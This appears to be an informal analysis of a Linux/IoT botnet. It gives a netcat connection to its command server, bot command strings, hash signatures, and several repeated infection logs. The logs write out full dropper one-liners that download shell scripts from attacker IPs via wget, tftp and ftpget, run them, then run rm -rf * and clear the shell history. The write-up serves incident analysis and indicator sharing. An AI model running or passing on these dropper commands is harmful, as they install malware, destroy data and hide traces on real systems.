a telnet (IRC-like) BOTNET
'''
nc -nv 192.3.7.154 23
(UNKNOWN) [192.3.7.154] 23 (telnet) open
!* SCANNER ON
!* FATCOCK
'''

Judging by the strings, I guess it's an IRC botnet:
"""
PONG!
GETLOCALIP
My IP: %s
SCANNER
SCANNER ON | OFF
REMOVING PROBE
PROBING
HOLD
JUNK
HTTP
HTTP Flooding %s for %d seconds.
KILLATTK
""" 

What it does:
It removes some services and replaces them with "fake" versions.
Services like: ssh, bash, wget, ntpd, ftp, etc.


(I thought this was only spreading through one server, but no.)
First log file (the first entry is cut off at its start; the entries after it show the complete command line):

777 bins.sh; sh bins.sh; tftp 192.3.7.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.3.7.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.7.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.3.7.154/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192.3.7.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.3.7.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.7.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.3.7.154/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192.3.7.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.3.7.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.7.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c

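Signatures (each line appears to be `MD5:size:name`, the layout ClamAV uses for hash signatures; the size is presumably in bytes):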

7250ff0dc2f310357e8e03ef796d9239:119890:apache2
16ff26d4c123b56bf68b63b7e259a1ca:114768:bash
14e52b22c737e02df7824b47a1687764:1592:bins.sh
4cf807b9d54346d7928030aaf22eb367:112632:cron
e0404b5804f92dd626b762cef05b0a57:99290:ftp
43070a6d279bfeec0e12a9dc88f5ffaa:149270:ntpd
fda3870f7dc941265e7a61efe571c283:107461:openssh
ab099fbd64b76d68d4f45a92814f2e7d:117893:pftp
5d2fc167792d730e1b8b7f58a4c5e5d4:126634:sh
bb9e4cdfb0b9d127c2616e2561de9111:149270:sshd
ac1db222507d9b29f2387cdc1aabf32a:142308:tftp
b3c5ec9c42e5865300e05323e47f80c6:99290:wget






This virus/worm seems to be spreading from different places, but 192.3.7.154 seems to be the
source.

second log 2h later:

cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget 
http://179.43.141.229/bin.sh || wget http://179.43.141.229/bin.sh || busybox tftp -r bin2.sh -
g 179.43.141.229 || tftp -r bin2.sh -g 179.43.141.229 || busybox tftp 179.43.141.229 -c get 
bin3.sh || tftp 179.43.141.229 -c get bin3.sh || busybox ftpget 179.43.141.229 bin4.sh bin4.sh 
|| ftpget 179.43.141.229 bin4.sh bin4.sh;sh bin.sh || sh bin2.sh || sh bin3.sh || sh 
bin4.sh;rm -f *;exit




cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://179.43.141.229/bin.sh || wget http://179.43.141.229/bin.sh || busybox tftp -r bin2.sh -g 179.43.141.229 || tftp -r bin2.sh -g 179.43.141.229 || busybox tftp 179.43.141.229 -c get bin3.sh || tftp 179.43.141.229 -c get bin3.sh || busybox ftpget 179.43.141.229 bin4.sh bin4.sh || ftpget 179.43.141.229 bin4.sh bin4.sh;sh bin.sh || sh bin2.sh || sh bin3.sh || sh bin4.sh;rm -f *;exit


root@server:~# sh || bash || shell
 cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://208.73.23.43/one.sh || wget http://208.73.23.43/one.sh || busybox ftpget 208.73.23.43 four.sh four.sh || ftpget 208.73.23.43 four.sh four.sh || busybox tftp -r two.sh -g 208.73.23.43 || tftp -r two.sh -g 208.73.23.43 || busybox tftp 208.73.23.43 -c get three.sh || tftp 208.73.23.43 -c get three.sh;sh one.sh || sh two.sh || sh three.sh || sh four.sh;rm -f *;exit &

cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://208.73.23.43/one.sh || wget http://208.73.23.43/one.sh || busybox ftpget 208.73.23.43 four.sh four.sh || ftpget 208.73.23.43 four.sh four.sh || busybox tftp -r two.sh -g 208.73.23.43 || tftp -r two.sh -g 208.73.23.43 || busybox tftp 208.73.23.43 -c get three.sh || tftp 208.73.23.43 -c get three.sh;sh one.sh || sh two.sh || sh three.sh || sh four.sh;rm -f *;exit &






777 bins.sh; sh bins.sh; tftp 192.3.7.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.3.7.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.7.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.3.7.154/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192.3.7.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.3.7.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.7.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.3.7.154/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192.3.7.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.3.7.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.7.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c